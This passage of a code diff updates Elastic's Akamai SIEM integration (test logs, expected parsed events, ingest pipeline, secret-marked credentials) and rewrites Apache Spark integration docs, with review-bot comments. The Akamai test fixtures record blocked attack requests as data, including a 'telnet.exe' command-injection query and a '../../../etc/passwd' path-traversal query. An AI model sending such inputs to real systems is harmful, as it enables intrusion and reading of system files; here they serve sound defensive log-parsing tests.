","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"Host:%20example.com%0D%0Ajsessionid:%0D%0AAccept-Encoding:%20gzip%0D%0A","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server:%20AkamaiGHost%0D%0AMime-Version:%201.0%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20150%0D%0AX-NoValueHeader:%0D%0A","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"","trust":"","general":"","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV 
VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f33","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} {"total":10000,"offset":"71cca;3phZmEdPj6YEqml0rvbdWDZGW3mCiJIwjyhkJfsLFM2gVYPgE8-N_0CiLI9gwH0_4OJ87xDQ3b-gIsx_kEBdf7aaC_AvDpG9fMxypeaCma10FKrY9VKE","limit":10000} \ No newline at end of file diff --git a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json index c0e3277b040..53132e063c5 100644 --- a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json +++ b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json 
@@ -175,6 +175,170 @@ "query": "option=com_jce telnet.exe" } }, + { + "@timestamp": "2017-04-04T10:57:02.000Z", + "akamai": { + "siem": { + "bot": { + "response_segment": 3, + "score": 100 + }, + "client_data": { + "app_bundle_id": "com.mydomain.myapp", + "app_version": "1.23", + "sdk_version": "4.7.1", + "telemetry_type": 2 + }, + "config_id": "14227", + "policy_id": "qik1_26545", + "request": { + "headers": { + "Accept-Encoding": "gzip", + "Host": "example.com" + } + }, + "response": { + "headers": { + "Content-Length": "150", + "Content-Type": "text/html", + "Mime-Version": "1.0", + "Server": "AkamaiGHost" + } + }, + "rule_actions": [ + "alert", + "deny" + ], + "rule_tags": [ + "owasp_crs/web_attack/file_injection", + "owasp_crs/web_attack/command_inject" + ], + "rules": [ + { + "ruleActions": "alert", + "ruleData": "telnet.exe", + "ruleMessages": "System Command Access", + "ruleSelectors": "ARGS:option", + "ruleTags": "OWASP_CRS/WEB_ATTACK/FILE_INJECTION", + "ruleVersions": "4", + "rules": "950002" + }, + { + "ruleActions": "alert", + "ruleData": "telnet.exe", + "ruleMessages": "System Command Injection", + "ruleSelectors": "ARGS:option", + "ruleTags": "OWASP_CRS/WEB_ATTACK/COMMAND_INJECT", + "ruleVersions": "4", + "rules": "950006" + }, + { + "ruleActions": "deny", + "ruleData": "Vector Score: 10, DENY threshold: 9, Ale", + "ruleMessages": "Anomaly Score Exceeded fo", + "ruleVersions": "1", + "rules": "CMD-INJECTION-ANOMALY" + } + ], + "user_risk": { + "allow": 0, + "score": 75, + "status": 0, + "uuid": "964d54b7-0821-413a-a4d6-8131770ec8d5" + } + } + }, + "client": { + "address": "89.160.20.156", + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.156" + }, + 
"ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "id": "1158db1758e37bfe67b7c09", + "kind": "event", + "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"14227\",\"policyId\":\"qik1_26545\",\"ruleActions\":\"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d\",\"ruleData\":\"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX \",\"ruleMessages\":\"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 \",\"ruleSelectors\":\"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b\",\"ruleTags\":\"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R \",\"ruleVersions\":\"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d\",\"rules\":\"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ\"},\"geo\":{\"asn\":\"14618\",\"city\":\"ASHBURN\",\"continent\":\"288\",\"country\":\"US\",\"regionCode\":\"VA\"},\"httpMessage\":{\"bytes\":\"266\",\"host\":\"www.hmapi.com\",\"method\":\"GET\",\"path\":\"/\",\"port\":\"80\",\"protocol\":\"HTTP/1.1\",\"query\":\"option=com_jce%20telnet.exe\",\"requestHeaders\":\"Host:%20example.com%0D%0Ajsessionid:%0D%0AAccept-Encoding:%20gzip%0D%0A\",\"requestId\":\"1158db1758e37bfe67b7c09\",\"responseHeaders\":\"Server:%20AkamaiGHost%0D%0AMime-Version:%201.0%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20150%0D%0AX-NoValueHeader:%0D%0A\",\"start\":\"1491303422\",\"status\":\"200\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"\",\"trust\":\"\",\"general\":\"\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", + "start": "2017-04-04T10:57:02.000Z" + }, + "http": { + "request": { + "id": 
"1158db1758e37bfe67b7c09", + "method": "GET" + }, + "response": { + "bytes": 266, + "status_code": 200 + }, + "version": "1.1" + }, + "network": { + "protocol": "http", + "transport": "tcp" + }, + "observer": { + "type": "proxy", + "vendor": "akamai" + }, + "related": { + "ip": [ + "89.160.20.156" + ] + }, + "source": { + "address": "89.160.20.156", + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.156" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "www.hmapi.com", + "full": "www.hmapi.com/?option=com_jce%20telnet.exe", + "path": "/", + "port": 80, + "query": "option=com_jce telnet.exe" + } + }, { "@timestamp": "2016-08-11T13:45:33.026Z", "akamai": { diff --git a/packages/akamai/data_stream/siem/_dev/test/system/test-default-config.yml b/packages/akamai/data_stream/siem/_dev/test/system/test-default-config.yml deleted file mode 100644 index 99922354029..00000000000 --- a/packages/akamai/data_stream/siem/_dev/test/system/test-default-config.yml +++ /dev/null @@ -1,16 +0,0 @@ -input: httpjson -service: akamai -vars: ~ -data_stream: - vars: - preserve_original_event: true - api_host: "http://{{Hostname}}:{{Port}}" - client_token: qwerasdf - client_secret: qazwsx - access_token: abcd - config_ids: aaaa - ssl: - verification_mode: none - enable_request_tracer: true -assert: - hit_count: 3 diff --git a/packages/akamai/data_stream/siem/_dev/test/system/test-emulator-config.yml b/packages/akamai/data_stream/siem/_dev/test/system/test-emulator-config.yml new file mode 100644 index 00000000000..ec8b4713d27 --- /dev/null +++ b/packages/akamai/data_stream/siem/_dev/test/system/test-emulator-config.yml 
@@ -0,0 +1,16 @@ +input: httpjson +service: akamai-siem-emulator +vars: ~ +data_stream: + vars: + preserve_original_event: true + api_host: "http://akamai-siem-emulator:9903" + client_token: ct-f625f0b8-9c8f-44ce-8250-eaf17bc93051 + client_secret: cs-0d15cfd9-764a-48e6-a822-22756180ddb8 + access_token: at-6b8c7217-8748-490d-b0f5-bfeb72b2e7cd + config_ids: 123456 + event_limit: 20 + enable_request_tracer: true +assert: + # 24 hours at 5 minutes between events. + hit_count: 288 # = 24 * 60/5 diff --git a/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml b/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml index 38f9bf9a26a..c9624ee5e76 100644 --- a/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml +++ b/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml @@ -67,10 +67,12 @@ processors: target_field: url.domain ignore_missing: true - urldecode: + tag: urldecode_httpMessage_path field: json.httpMessage.path target_field: url.path ignore_missing: true - urldecode: + tag: urldecode_httpMessage_query field: json.httpMessage.query target_field: url.query ignore_missing: true 
@@ -83,24 +85,28 @@ processors: type: long ignore_missing: true - urldecode: + tag: urldecode_httpMessage_responseHeaders field: json.httpMessage.responseHeaders - target_field: _tmp.response.headers ignore_missing: true - kv: - field: _tmp.response.headers + if: ctx.json?.httpMessage?.responseHeaders != "" + tag: kv_httpMessage_responseHeaders + field: json.httpMessage.responseHeaders target_field: akamai.siem.response.headers field_split: '\r\n' - value_split: ': ' + value_split: ':\s*' ignore_missing: true - urldecode: + tag: urldecode_httpMessage_requestHeaders field: json.httpMessage.requestHeaders - target_field: _tmp.request.headers ignore_missing: true - kv: - field: _tmp.request.headers + if: ctx.json?.httpMessage?.requestHeaders != "" + tag: kv_httpMessage_requestHeaders + field: json.httpMessage.requestHeaders target_field: akamai.siem.request.headers field_split: '\r\n' - value_split: ': ' + value_split: ':\s*' ignore_missing: true - script: lang: painless @@ -194,6 +200,7 @@ processors: ignore_missing: true ## Attack Data - urldecode: + tag: urldecode_attackData_ruleActions field: json.attackData.ruleActions target_field: json.attackData.ruleActions ignore_missing: true @@ -203,6 +210,7 @@ processors: separator: ';' preserve_trailing: true - urldecode: + tag: urldecode_attackData_ruleData field: json.attackData.ruleData target_field: json.attackData.ruleData ignore_missing: true @@ -212,6 +220,7 @@ processors: separator: ';' preserve_trailing: true - urldecode: + tag: urldecode_attackData_ruleMessages field: json.attackData.ruleMessages target_field: json.attackData.ruleMessages ignore_missing: true @@ -221,6 +230,7 @@ processors: separator: ';' preserve_trailing: true - urldecode: + tag: urldecode_attackData_ruleSelectors field: json.attackData.ruleSelectors target_field: json.attackData.ruleSelectors ignore_missing: true 
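Review bot: The new `if: ctx.json?.httpMessage?.responseHeaders != ""` and `requestHeaders` guards carry no explanation, and a reader seeing `ignore_missing: true` directly below may take them for redundant and remove them; the changelog entry in this diff ("Fix errors processing empty userRiskData ... values") is the only hint that `kv` raises on an empty string while `ignore_missing` covers only an absent field. A one-line comment above each guard, `# kv fails on an empty string; ignore_missing only covers a missing field.`, would preserve that, and the same applies to the three `userRiskData` guards in the `@@ -386,18 +400,24 @@` hunk. The guard still leaves one path to the pipeline-level `on_failure`: a header segment with no `:` at all, which, if I read the kv processor correctly, still raises; since header text is externally influenced input, the pipeline depends on that `on_failure` block (rewritten in the `@@ -458,4 +478,7 @@` hunk) to keep such events rather than drop them, and the comment could say so.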
@@ -230,6 +240,7 @@ processors: separator: ';' preserve_trailing: true - urldecode: + tag: urldecode_attackData_ruleTags field: json.attackData.ruleTags target_field: json.attackData.ruleTags ignore_missing: true @@ -239,6 +250,7 @@ processors: separator: ';' preserve_trailing: true - urldecode: + tag: urldecode_attackData_ruleVersions field: json.attackData.ruleVersions target_field: json.attackData.ruleVersions ignore_missing: true @@ -248,6 +260,7 @@ processors: separator: ';' preserve_trailing: true - urldecode: + tag: urldecode_attackData_rules field: json.attackData.rules target_field: json.attackData.rules ignore_missing: true @@ -259,6 +272,7 @@ processors: - script: lang: painless description: Base64 Decode the json.attackData.rule* fields + tag: script_base64_decode_attackData_rule source: | ArrayList items = new ArrayList(["rules", "ruleActions", "ruleData", "ruleMessages", "ruleTags", "ruleSelectors", "ruleVersions"]); ArrayList rules_array = new ArrayList(); @@ -386,18 +400,24 @@ processors: type: long ignore_missing: true - kv: + if: ctx.json?.userRiskData?.risk != "" + tag: kv_userRiskData_risk field: json.userRiskData.risk target_field: akamai.siem.user_risk.risk field_split: '\|' value_split: ':' ignore_missing: true - kv: + if: ctx.json?.userRiskData?.trust != "" + tag: kv_userRiskData_trust field: json.userRiskData.trust target_field: akamai.siem.user_risk.trust field_split: '\|' value_split: ':' ignore_missing: true - kv: + if: ctx.json?.userRiskData?.general != "" + tag: kv_userRiskData_general field: json.userRiskData.general target_field: akamai.siem.user_risk.general field_split: '\|' 
@@ -458,4 +478,7 @@ on_failure: value: pipeline_error - append: field: error.message - value: '{{{ _ingest.on_failure_message }}}' + value: >- + Processor '{{ _ingest.on_failure_processor_type }}' + {{#_ingest.on_failure_processor_tag}}with tag '{{ _ingest.on_failure_processor_tag }}' + {{/_ingest.on_failure_processor_tag}}failed with message '{{ _ingest.on_failure_message }}' diff --git a/packages/akamai/data_stream/siem/fields/fields.yml b/packages/akamai/data_stream/siem/fields/fields.yml index c028f1c954e..ba1f681e4c9 100644 --- a/packages/akamai/data_stream/siem/fields/fields.yml +++ b/packages/akamai/data_stream/siem/fields/fields.yml @@ -20,6 +20,28 @@ description: > Rules triggered by this request + fields: + - name: ruleVersions + type: keyword + description: Versions of rules triggered for this request. + - name: ruleMessages + type: keyword + description: Messages of rules that triggered for this request. + - name: ruleTags + type: keyword + description: Tags of rules that triggered for this request. + - name: ruleActions + type: keyword + description: Actions of rules that triggered for this request. + - name: rules + type: keyword + description: Rules that triggered for this request. + - name: ruleData + type: keyword + description: User data of rules that triggered for this request. + - name: ruleSelectors + type: keyword + description: Selectors of rules that triggered for this request. - name: rule_actions type: keyword description: > diff --git a/packages/akamai/data_stream/siem/manifest.yml b/packages/akamai/data_stream/siem/manifest.yml index 1de85ac81b0..3cfdaffbb7d 100644 --- a/packages/akamai/data_stream/siem/manifest.yml +++ b/packages/akamai/data_stream/siem/manifest.yml 
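Review bot: The rewritten error message switches from the triple-brace `{{{ _ingest.on_failure_message }}}` of the removed line to double braces for every placeholder. As far as I know, Elasticsearch's ingest Mustache escapes values in the double-brace form, so a failure message containing quotes or backslashes may land in `error.message` escaped; please confirm, and if so restore triple braces for the three value placeholders, e.g. `Processor '{{{ _ingest.on_failure_processor_type }}}'`. The folded scalar (`>-`) turns the line breaks into single spaces, which reads correctly both with and without a tag, so the layout itself is fine.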
@@ -16,12 +16,13 @@ streams: show_user: true default: https://akzz-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.luna.akamaiapis.net - name: client_token - type: text + type: password title: Client Token description: Client token provided by "Credentials" ui multi: false required: true show_user: true + secret: true - name: client_secret type: password title: Client Secret @@ -29,6 +30,7 @@ streams: multi: false required: true show_user: true + secret: true - name: access_token type: password title: Access Token @@ -36,6 +38,7 @@ streams: multi: false required: true show_user: true + secret: true - name: config_ids type: text title: Zone ID @@ -140,6 +143,7 @@ streams: multi: false required: false show_user: true + secret: true - name: service_account_file type: text title: "Credentials file path" diff --git a/packages/akamai/docs/README.md b/packages/akamai/docs/README.md index 9b8f02b0339..43074ae0ed7 100644 --- a/packages/akamai/docs/README.md +++ b/packages/akamai/docs/README.md 
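Review bot: The `@@ -140,6 +143,7 @@` hunk adds `secret: true` to a variable whose `name` and `type` lines are outside the hunk, so it cannot be seen here whether it is a `password` field like the three credentials earlier in this file. Please confirm the type matches; marking a `text` variable as secret while it is still rendered in clear text would be inconsistent with the `client_token` change in the first hunk, which switched the type to `password` at the same time it added `secret: true`.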
@@ -41,7 +41,13 @@ See [Akamai API get started](https://techdocs.akamai.com/siem-integration/refere | akamai.siem.response.headers | HTTP response headers | flattened | | akamai.siem.rule_actions | Actions taken for this request. | keyword | | akamai.siem.rule_tags | The set of categories for the triggered rule. | keyword | -| akamai.siem.rules | Rules triggered by this request | nested | +| akamai.siem.rules.ruleActions | Actions of rules that triggered for this request. | keyword | +| akamai.siem.rules.ruleData | User data of rules that triggered for this request. | keyword | +| akamai.siem.rules.ruleMessages | Messages of rules that triggered for this request. | keyword | +| akamai.siem.rules.ruleSelectors | Selectors of rules that triggered for this request. | keyword | +| akamai.siem.rules.ruleTags | Tags of rules that triggered for this request. | keyword | +| akamai.siem.rules.ruleVersions | Versions of rules triggered for this request. | keyword | +| akamai.siem.rules.rules | Rules that triggered for this request. | keyword | | akamai.siem.slow_post_action | Action taken if a Slow POST attack is detected: W for Warn or A for deny (abort). | keyword | | akamai.siem.slow_post_rate | Recorded rate of a detected Slow POST attack. | long | | akamai.siem.user_risk.allow | Indicates whether the user is on the allow list. A 0 indicates that the user was not on the list; a 1 indicates that the user was on the list. | long | diff --git a/packages/akamai/manifest.yml b/packages/akamai/manifest.yml index b8e8a35394c..7e332f7b83b 100644 --- a/packages/akamai/manifest.yml +++ b/packages/akamai/manifest.yml @@ -1,13 +1,13 @@ name: akamai title: Akamai -version: "2.21.1" +version: "2.23.2" description: Collect logs from Akamai with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: [security, cdn_security] conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/akamai_logo.svg title: Akamai 
diff --git a/packages/amazon_security_lake/changelog.yml b/packages/amazon_security_lake/changelog.yml index 169c618f1c0..042c53d525a 100644 --- a/packages/amazon_security_lake/changelog.yml +++ b/packages/amazon_security_lake/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/amazon_security_lake/data_stream/event/manifest.yml b/packages/amazon_security_lake/data_stream/event/manifest.yml index ae338dc7a22..cfdaa053df2 100644 --- a/packages/amazon_security_lake/data_stream/event/manifest.yml +++ b/packages/amazon_security_lake/data_stream/event/manifest.yml @@ -22,6 +22,7 @@ streams: required: false show_user: true description: First part of access key. + secret: true - name: secret_access_key type: password title: Secret Access Key @@ -29,13 +30,15 @@ streams: required: false show_user: true description: Second part of access key. + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true description: Required when using temporary security credentials. + secret: true - name: decoding_batch_size type: integer title: Batch Size of Parquet Decoding diff --git a/packages/amazon_security_lake/manifest.yml b/packages/amazon_security_lake/manifest.yml index e12e750aff1..7a775283cb1 100644 --- a/packages/amazon_security_lake/manifest.yml +++ b/packages/amazon_security_lake/manifest.yml @@ -1,13 +1,13 @@ format_version: "3.0.0" name: amazon_security_lake title: Amazon Security Lake -version: "1.0.1" +version: "1.1.0" description: Collect logs from Amazon Security Lake with Elastic Agent. type: integration categories: ["aws", "security"] conditions: kibana: - version: ^8.11.0 + version: ^8.12.0 elastic: subscription: basic screenshots: 
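Review bot: `packages/amazon_security_lake/manifest.yml` keeps `format_version: "3.0.0"` (an unchanged context line in its hunk) while the akamai package in this same diff raises its format_version to `3.0.2` alongside the same `secret: true` additions. If the `secret` property needs the newer spec version, this manifest wants the same bump, `format_version: "3.0.2"`; if 3.0.0 already accepts it, the akamai bump is unrelated and this can be ignored. The Kibana constraint was raised to `^8.12.0` in both packages, so that side is consistent.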
diff --git a/packages/apache_spark/_dev/build/docs/README.md b/packages/apache_spark/_dev/build/docs/README.md
index 2f72c5695ee..3d88a86a7f7 100644
--- a/packages/apache_spark/_dev/build/docs/README.md
+++ b/packages/apache_spark/_dev/build/docs/README.md
@@ -1,13 +1,38 @@ # Apache Spark Integration -The Apache Spark integration collects and parses data using the Jolokia Input. +## Overview + +[Apache Spark](https://spark.apache.org) is an open-source, distributed computing system that provides a fast and general-purpose cluster-computing framework. It offers in-memory data processing capabilities, which significantly enhances the performance of big data analytics applications. Spark provides support for a variety of programming languages including Scala, Python, Java, and R, and comes with built-in modules for SQL, streaming, machine learning, and graph processing. This makes it a versatile tool for a wide range of data processing and analysis tasks. + +Use the Apache Spark integration to: + +- Collect metrics related to the application, driver, executor and node. +- Create visualizations to monitor, measure, and analyze usage trends and key data, deriving business insights. +- Create alerts to reduce the MTTD and MTTR by referencing relevant logs when troubleshooting an issue. + +## Data streams + +The Apache Spark integration collects metrics data. + +Metrics provide insight into the statistics of Apache Spark. The `Metric` data streams collected by the Apache Spark integration include `application`, `driver`, `executor`, and `node`, allowing users to monitor and troubleshoot the performance of their Apache Spark instance. + +Data streams: +- `application`: Collects information related to the number of cores used, application name, runtime in milliseconds and current status of the application. +- `driver`: Collects information related to the driver details, job durations, task execution, memory usage, executor status and JVM metrics. +- `executor`: Collects information related to the operations, memory usage, garbage collection, file handling, and threadpool activity. 
+- `node`: Collects information related to the application count, waiting applications, worker metrics, executor count, core usage and memory usage. + +Note: +- Users can monitor and view the metrics inside the ingested documents for Apache Spark under the `metrics-*` index pattern in `Discover`. ## Compatibility -This integration has been tested against `Apache Spark version 3.5.0` +This integration has been tested against `Apache Spark version 3.5.0`. ## Requirements +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + In order to ingest data from Apache Spark, you must know the full hosts for the Main and Worker nodes. To proceed with the Jolokia setup, Apache Spark should be installed as a standalone setup. Make sure that the spark folder is installed in the `/usr/local` path. If not, then specify the path of spark folder in the further steps. You can install the standalone setup from the official download page of [Apache Spark](https://spark.apache.org/downloads.html). 
@@ -63,15 +88,23 @@ Restart Spark master. Follow the same set of steps for Spark Worker, Driver and Executor. -### Troubleshooting +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting Started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Validation + +After the integration is successfully configured, click on the *Assets* tab of the Apache Spark Integration to display the available dashboards. Select the dashboard for your configured data stream, which should be populated with the required data. + +## Troubleshooting -If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Application``, ``Driver``, ``Executor`` and ``Node`` data stream's indices. +If `host.ip` appears conflicted under the ``metrics-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Application``, ``Driver``, ``Executor`` and ``Node`` data stream. ## Metrics ### Application -This is the `application` data stream. +The `application` data stream collects metrics related to the number of cores used, application name, runtime in milliseconds, and current status of the application. {{event "application"}} @@ -79,7 +112,7 @@ This is the `application` data stream. ### Driver -This is the `driver` data stream. +The `driver` data stream collects metrics related to the driver details, job durations, task execution, memory usage, executor status, and JVM metrics. {{event "driver"}} 
@@ -87,7 +120,7 @@ This is the `driver` data stream. ### Executor -This is the `executor` data stream. +The `executor` data stream collects metrics related to the operations, memory usage, garbage collection, file handling, and threadpool activity. {{event "executor"}} @@ -95,7 +128,7 @@ This is the `executor` data stream. ### Node -This is the `node` data stream. +The `node` data stream collects metrics related to the application count, waiting applications, worker metrics, executor count, core usage, and memory usage. {{event "node"}} diff --git a/packages/apache_spark/changelog.yml b/packages/apache_spark/changelog.yml index a6f5fb042d8..7a7d5175d28 100644 --- a/packages/apache_spark/changelog.yml +++ b/packages/apache_spark/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.0.3" + changes: + - description: Update README to follow documentation guidelines. + type: enhancement + link: https://github.com/elastic/integrations/pull/9068 +- version: "1.0.2" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 +- version: "1.0.1" + changes: + - description: Update the link to the correct reindexing procedure. + type: bugfix + link: https://github.com/elastic/integrations/pull/9021 - version: "1.0.0" changes: - description: Make Apache Spark GA. diff --git a/packages/apache_spark/docs/README.md b/packages/apache_spark/docs/README.md index 0534f84a922..f42e8023eee 100644 --- a/packages/apache_spark/docs/README.md +++ b/packages/apache_spark/docs/README.md 
@@ -1,13 +1,38 @@ # Apache Spark Integration -The Apache Spark integration collects and parses data using the Jolokia Input. +## Overview + +[Apache Spark](https://spark.apache.org) is an open-source, distributed computing system that provides a fast and general-purpose cluster-computing framework. It offers in-memory data processing capabilities, which significantly enhances the performance of big data analytics applications. Spark provides support for a variety of programming languages including Scala, Python, Java, and R, and comes with built-in modules for SQL, streaming, machine learning, and graph processing. This makes it a versatile tool for a wide range of data processing and analysis tasks. + +Use the Apache Spark integration to: + +- Collect metrics related to the application, driver, executor and node. +- Create visualizations to monitor, measure, and analyze usage trends and key data, deriving business insights. +- Create alerts to reduce the MTTD and MTTR by referencing relevant logs when troubleshooting an issue. + +## Data streams + +The Apache Spark integration collects metrics data. + +Metrics provide insight into the statistics of Apache Spark. The `Metric` data streams collected by the Apache Spark integration include `application`, `driver`, `executor`, and `node`, allowing users to monitor and troubleshoot the performance of their Apache Spark instance. + +Data streams: +- `application`: Collects information related to the number of cores used, application name, runtime in milliseconds and current status of the application. +- `driver`: Collects information related to the driver details, job durations, task execution, memory usage, executor status and JVM metrics. +- `executor`: Collects information related to the operations, memory usage, garbage collection, file handling, and threadpool activity. 
+- `node`: Collects information related to the application count, waiting applications, worker metrics, executor count, core usage and memory usage. + +Note: +- Users can monitor and view the metrics inside the ingested documents for Apache Spark under the `metrics-*` index pattern in `Discover`. ## Compatibility -This integration has been tested against `Apache Spark version 3.5.0` +This integration has been tested against `Apache Spark version 3.5.0`. ## Requirements +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + In order to ingest data from Apache Spark, you must know the full hosts for the Main and Worker nodes. To proceed with the Jolokia setup, Apache Spark should be installed as a standalone setup. Make sure that the spark folder is installed in the `/usr/local` path. If not, then specify the path of spark folder in the further steps. You can install the standalone setup from the official download page of [Apache Spark](https://spark.apache.org/downloads.html). 
@@ -63,15 +88,23 @@ Restart Spark master. Follow the same set of steps for Spark Worker, Driver and Executor. -### Troubleshooting +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting Started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Validation + +After the integration is successfully configured, click on the *Assets* tab of the Apache Spark Integration to display the available dashboards. Select the dashboard for your configured data stream, which should be populated with the required data. + +## Troubleshooting -If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Application``, ``Driver``, ``Executor`` and ``Node`` data stream's indices. +If `host.ip` appears conflicted under the ``metrics-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Application``, ``Driver``, ``Executor`` and ``Node`` data stream. ## Metrics ### Application -This is the `application` data stream. +The `application` data stream collects metrics related to the number of cores used, application 